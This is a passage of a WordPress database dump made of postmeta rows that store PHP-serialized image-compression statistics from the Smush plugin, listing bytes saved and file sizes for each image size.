:5:{s:7:\"percent\";d:10.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:413;s:11:\"size_before\";i:4049;s:10:\"size_after\";i:3636;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1036;s:11:\"size_before\";i:8233;s:10:\"size_after\";i:7197;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1340;s:11:\"size_before\";i:10013;s:10:\"size_after\";i:8673;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4216,2392,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.44447487333972190981512540020048618316650390625;s:5:\"bytes\";i:2694;s:11:\"size_before\";i:14606;s:10:\"size_after\";i:11912;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:300;s:11:\"size_before\";i:2010;s:10:\"size_after\";i:1710;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:880;s:11:\"size_before\";i:4596;s:10:\"size_after\";i:3716;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:516;s:11:\"size_before\";i:2913;s:10:\"size_after\";i:2397;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.620000000000000994759830064140260219573974609375;s:5:\"bytes\";i:998;s:11:\"size_before\";i:5087;s:10:\"size_after\";i:4089;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4217,2391,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:59562;s:10:\"size_after\";i:59562;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:9209;s:10:\"size_after\";i:9209;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19308;s:10:\"size_after\";i:19308;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:31045;s:10:\"size_after\";i:31045;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4218,2390,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.733413560084105853320579626597464084625244140625;s:5:\"bytes\";i:16233;s:11:\"size_before\";i:151238;s:10:\"size_after\";i:135005;s:4:\"time\";d:0.93000000000000004884981308350688777863979339599609375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2234;s:11:\"size_before\";i:13193;s:10:\"size_after\";i:10959;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:10301;s:11:\"size_before\";i:47285;s:10:\"size_after\";i:36984;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3698;s:11:\"size_before\";i:26107;s:10:\"size_after\";i:22409;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:30145;s:10:\"size_after\";i:30145;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:34508;s:10:\"size_after\";i:34508;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4219,2389,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8498;s:10:\"size_after\";i:8498;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8498;s:10:\"size_after\";i:8498;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4220,2388,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10369;s:10:\"size_after\";i:10369;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10369;s:10:\"size_after\";i:10369;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4221,2387,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:15132;s:10:\"size_after\";i:15132;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:15132;s:10:\"size_after\";i:15132;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4222,2386,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8466;s:10:\"size_after\";i:8466;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8466;s:10:\"size_after\";i:8466;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4223,2385,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10086;s:10:\"size_after\";i:10086;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10086;s:10:\"size_after\";i:10086;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4224,2384,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:12201;s:10:\"size_after\";i:12201;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:12201;s:10:\"size_after\";i:12201;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}}}'),(4225,2383,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:11901;s:10:\"size_after\";i:11901;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:11901;s:10:\"size_after\";i:11901;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4226,2382,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.09061048816400497918355227966458187438547611236572265625;s:5:\"bytes\";i:8;s:11:\"size_before\";i:8829;s:10:\"size_after\";i:8821;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.0899999999999999966693309261245303787291049957275390625;s:5:\"bytes\";i:8;s:11:\"size_before\";i:8829;s:10:\"size_after\";i:8821;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4227,2381,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10402;s:10:\"size_after\";i:10402;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10402;s:10:\"size_after\";i:10402;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4228,2380,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:13934;s:10:\"size_after\";i:13934;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:13934;s:10:\"size_after\";i:13934;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4229,2379,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:13977;s:10:\"size_after\";i:13977;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:13977;s:10:\"size_after\";i:13977;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}}}'),(4230,2378,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10381;s:10:\"size_after\";i:10381;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10381;s:10:\"size_after\";i:10381;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4231,2364,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.221152638848199245558134862221777439117431640625;s:5:\"bytes\";i:2920;s:11:\"size_before\";i:23893;s:10:\"size_after\";i:20973;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:211;s:11:\"size_before\";i:2272;s:10:\"size_after\";i:2061;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:502;s:11:\"size_before\";i:4221;s:10:\"size_after\";i:3719;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:359;s:11:\"size_before\";i:2657;s:10:\"size_after\";i:2298;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:787;s:11:\"size_before\";i:5914;s:10:\"size_after\";i:5127;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1061;s:11:\"size_before\";i:8829;s:10:\"size_after\";i:7768;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4232,2363,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.146816348009121355744355241768062114715576171875;s:5:\"bytes\";i:2998;s:11:\"size_before\";i:22804;s:10:\"size_after\";i:19806;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:207;s:11:\"size_before\";i:2203;s:10:\"size_after\";i:1996;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:523;s:11:\"size_before\";i:4079;s:10:\"size_after\";i:3556;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:348;s:11:\"size_before\";i:2685;s:10:\"size_after\";i:2337;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:799;s:11:\"size_before\";i:5734;s:10:\"size_after\";i:4935;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1121;s:11:\"size_before\";i:8103;s:10:\"size_after\";i:6982;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4233,2362,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.16140900567305183077593255802639760076999664306640625;s:5:\"bytes\";i:340;s:11:\"size_before\";i:210645;s:10:\"size_after\";i:210305;s:4:\"time\";d:0.39000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:340;s:11:\"size_before\";i:10491;s:10:\"size_after\";i:10151;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:24854;s:10:\"size_after\";i:24854;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:30403;s:10:\"size_after\";i:30403;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:67253;s:10:\"size_after\";i:67253;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:77644;s:10:\"size_after\";i:77644;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4234,2361,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.74223356130609097203176816037739627063274383544921875;s:5:\"bytes\";i:1731;s:11:\"size_before\";i:233215;s:10:\"size_after\";i:231484;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:547;s:11:\"size_before\";i:10925;s:10:\"size_after\";i:10378;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1184;s:11:\"size_before\";i:26244;s:10:\"size_after\";i:25060;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:32258;s:10:\"size_after\";i:32258;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:75616;s:10:\"size_after\";i:75616;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:88172;s:10:\"size_after\";i:88172;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(4235,2360,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.617584745762709275140878162346780300140380859375;s:5:\"bytes\";i:4218;s:11:\"size_before\";i:22656;s:10:\"size_after\";i:18438;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.7200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:307;s:11:\"size_before\";i:2237;s:10:\"size_after\";i:1930;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:636;s:11:\"size_before\";i:4093;s:10:\"size_after\";i:3457;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.629999999999999005240169935859739780426025390625;s:5:\"bytes\";i:472;s:11:\"size_before\";i:2533;s:10:\"size_after\";i:2061;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1187;s:11:\"size_before\";i:5847;s:10:\"size_after\";i:4660;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1616;s:11:\"size_before\";i:7946;s:10:\"size_after\";i:6330;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4236,2359,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.1988361832099361237169432570226490497589111328125;s:5:\"bytes\";i:31571;s:11:\"size_before\";i:438557;s:10:\"size_after\";i:406986;s:4:\"time\";d:0.8000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.399999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:502;s:11:\"size_before\";i:14747;s:10:\"size_after\";i:14245;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:4254;s:11:\"size_before\";i:62081;s:10:\"size_after\";i:57827;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:3981;s:11:\"size_before\";i:41178;s:10:\"size_after\";i:37197;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:10891;s:11:\"size_before\";i:131139;s:10:\"size_after\";i:120248;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.30999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:11943;s:11:\"size_before\";i:189412;s:10:\"size_after\";i:177469;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}}}'),(4237,2353,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:210264;s:10:\"size_after\";i:210264;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:20895;s:10:\"size_after\";i:20895;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:57008;s:10:\"size_after\";i:57008;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:51754;s:10:\"size_after\";i:51754;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:80607;s:10:\"size_after\";i:80607;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(4238,2352,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.021331035743191950615482710418291389942169189453125;s:5:\"bytes\";i:5786;s:11:\"size_before\";i:191505;s:10:\"size_after\";i:185719;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1829;s:11:\"size_before\";i:21147;s:10:\"size_after\";i:19318;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.970000000000000195399252334027551114559173583984375;s:5:\"bytes\";i:1683;s:11:\"size_before\";i:56625;s:10:\"size_after\";i:54942;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:815;s:11:\"size_before\";i:39081;s:10:\"size_after\";i:38266;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.9499999999999999555910790149937383830547332763671875;s:5:\"bytes\";i:1459;s:11:\"size_before\";i:74652;s:10:\"size_after\";i:73193;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}}}'),(4239,2351,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.55844315658089815901377050977316685020923614501953125;s:5:\"bytes\";i:953;s:11:\"size_before\";i:170653;s:10:\"size_after\";i:169700;s:4:\"time\";d:0.39000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:16308;s:10:\"size_after\";i:16308;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:48658;s:10:\"size_after\";i:48658;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:36625;s:10:\"size_after\";i:36625;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.37999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:953;s:11:\"size_before\";i:69062;s:10:\"size_after\";i:68109;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4240,2349,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:150932;s:10:\"size_after\";i:150932;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:15362;s:10:\"size_after\";i:15362;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:44323;s:10:\"size_after\";i:44323;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:31390;s:10:\"size_after\";i:31390;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\